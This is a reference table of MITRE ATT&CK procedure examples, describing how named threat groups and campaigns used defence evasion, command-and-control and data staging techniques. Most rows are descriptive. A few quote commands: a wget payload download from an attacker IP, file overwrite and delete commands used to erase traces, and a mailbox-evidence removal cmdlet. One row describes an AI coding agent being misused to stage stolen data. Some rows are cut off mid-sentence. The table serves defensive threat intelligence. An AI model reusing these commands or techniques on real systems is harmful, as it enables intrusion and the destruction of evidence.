Real-world descriptions of how a group, tool or campaign used a technique.
1146 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1070.004 File Deletion |
CampaignKV Botnet Activity | KV Botnet Activity removes on-disk copies of tools and other artifacts after it the primary botnet payload has been loaded into memory on the victim device. |
| T1070.004 File Deletion |
CampaignRedPenguin | During RedPenguin, UNC3886 used malware capaple of removing scripts after execution. |
| T1070.004 File Deletion |
CampaignOperation Honeybee | During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files. |
| T1070.004 File Deletion |
Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered. |
| T1070.004 File Deletion |
CampaignCutting Edge | During Cutting Edge, threat actors deleted `/tmp/test1.txt` on compromised Ivanti Connect Secure VPNs which was used to hold stolen configuration and cache files. |
| T1070.004 File Deletion |
CampaignOperation Digital Eye | During Operation Digital Eye, threat actors deleted files delivered to compromised hosts, often named with the pattern do.* such as do.exe. |
| T1070.004 File Deletion |
CampaignC0032 | During the C0032 campaign, TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them. |
| T1070.004 File Deletion |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 routinely removed their tools, including custom backdoors, once remote access was achieved. |
| T1070.004 File Deletion |
CampaignOperation AkaiRyū | During Operation AkaiRyū, MirrorFace deleted delivered tools and files from compromised hosts. |
| T1070.004 File Deletion |
CampaignArcaneDoor | ArcaneDoor included multiple instances of file deletion or removal during execution and other adversary actions. |
| T1070.004 File Deletion |
CampaignAPT41 DUST | APT41 DUST deleted various artifacts from victim systems following use. |
| T1070.004 File Deletion |
CampaignOperation Wocao | During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\windows\temp\ & copy \\<IP ADDRESS>\c$\windows\system32\devmgr.dll \\<IP ADDRESS>\c$\windows\temp\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\windows\temp\ & del \\<IP ADDRESS>\c$\windows\temp\LMAKSW.ps1`. |
| T1070.006 Timestomp |
CampaignCutting Edge | During Cutting Edge, threat actors changed timestamps of multiple files on compromised Ivanti Secure Connect VPNs to conceal malicious activity. |
| T1070.006 Timestomp |
CampaignC0032 | During the C0032 campaign, TEMP.Veles used timestomping to modify the |
| T1070.006 Timestomp |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 modified timestamps of backdoors to match legitimate Windows files. |
| T1070.007 Clear Network Connection History and Configurations |
CampaignRedPenguin | During RedPenguin, UNC3886 used an implant to delete logs associated with unauthorized access to targeted Junos OS devices. |
| T1070.008 Clear Mailbox Data |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 removed evidence of email export requests using `Remove-MailboxExportRequest`. |
| T1071 Application Layer Protocol |
CampaignFrostyGoop Incident | During FrostyGoop Incident, the adversary initiated Layer Two Tunnelling Protocol (L2TP) connections to Moscow-based IP addresses. |
| T1071.001 Web Protocols |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers. |
| T1071.001 Web Protocols |
CampaignSharePoint ToolShell Exploitation | During SharePoint ToolShell Exploitation, threat actors issued HTTP `POST` requests to web shells with spoofed or empty Referrer headers, to circumvent authorization controls. |
| T1071.001 Web Protocols |
CampaignFrankenstein | During Frankenstein, the threat actors used HTTP GET requests for C2. |
| T1071.001 Web Protocols |
CampaignRedDelta Modified PlugX Infection Chain Operations | Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations. |
| T1071.001 Web Protocols |
CampaignOperation MidnightEclipse | During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads. |
| T1071.001 Web Protocols |
Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. |
| T1071.001 Web Protocols |
CampaignIndian Critical Infrastructure Intrusions | During Indian Critical Infrastructure Intrusions, RedEcho network activity included SSL traffic over TCP 443 and HTTP traffic over non-standard ports. |
| T1071.001 Web Protocols |
Campaign3CX Supply Chain Attack | During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request. |
| T1071.001 Web Protocols |
CampaignC0018 | During C0018, the threat actors used HTTP for C2 communications. |
| T1071.001 Web Protocols |
CampaignC0021 | During C0021, the threat actors used HTTP for some of their C2 communications. |
| T1071.001 Web Protocols |
CampaignJuicy Mix | During Juicy Mix, OilRig used a VBS script to send POST requests to register installed malware with C2. |
| T1071.001 Web Protocols |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration. |
| T1071.001 Web Protocols |
CampaignOperation CuckooBees | During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners. |
| T1071.001 Web Protocols |
CampaignOuter Space | During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API. |
| T1071.001 Web Protocols |
CampaignArcaneDoor | ArcaneDoor command and control activity was conducted through HTTP. |
| T1071.001 Web Protocols |
CampaignAPT41 DUST | APT41 DUST used HTTPS for command and control. |
| T1071.001 Web Protocols |
CampaignNight Dragon | During Night Dragon, threat actors used HTTP for C2. |
| T1071.001 Web Protocols |
CampaignVersa Director Zero Day Exploitation | Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers. |
| T1071.001 Web Protocols |
CampaignOperation Wocao | During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS. |
| T1071.001 Web Protocols |
CampaignC0017 | During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
| T1071.001 Web Protocols |
CampaignQuad7 Activity | Quad7 Activity has used the same User Agents of |
| T1071.002 File Transfer Protocols |
CampaignOperation Honeybee | During Operation Honeybee, the threat actors had the ability to use FTP for C2. |
| T1071.002 File Transfer Protocols |
CampaignQuad7 Activity | Quad7 Activity has used a File Transfer Protocol (FTP) server to download malicious binaries. |
| T1071.004 DNS |
CampaignCutting Edge | During Cutting Edge, threat actors used DNS to tunnel IPv4 C2 traffic. |
| T1072 Software Deployment Tools |
CampaignC0018 | During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network. |
| T1074.001 Local Data Staging |
CampaignSharePoint ToolShell Exploitation | During SharePoint ToolShell Exploitation, threat actors staged stolen data from web.config files to debug_dev.js. |
| T1074.001 Local Data Staging |
CampaignOperation Honeybee | During Operation Honeybee, stolen data was copied into a text file using the format `From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt` prior to compression, encoding, and exfiltration. |
| T1074.001 Local Data Staging |
CampaignOperation MidnightEclipse | During Operation MidnightEclipse, threat actors copied files to the web application folder on compromised devices for exfiltration. |
| T1074.001 Local Data Staging |
CampaignAnthropic AI-orchestrated Campaign | During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to stage extracted data and operational documentation in structured markdown files on local systems prior to exfiltration. |
| T1074.001 Local Data Staging |
CampaignC0015 | During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`. |
| T1074.001 Local Data Staging |
CampaignJuicy Mix | During Juicy Mix, OilRig used browser data and credential stealer tools to stage stolen files named Cupdate, Eupdate, and IUpdate in the %TEMP% directory. |
| T1074.001 Local Data Staging |
CampaignC0032 | During the C0032 campaign, TEMP.Veles used staging folders that are infrequently used by legitimate users or processes to store data for exfiltration and tool deployment. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.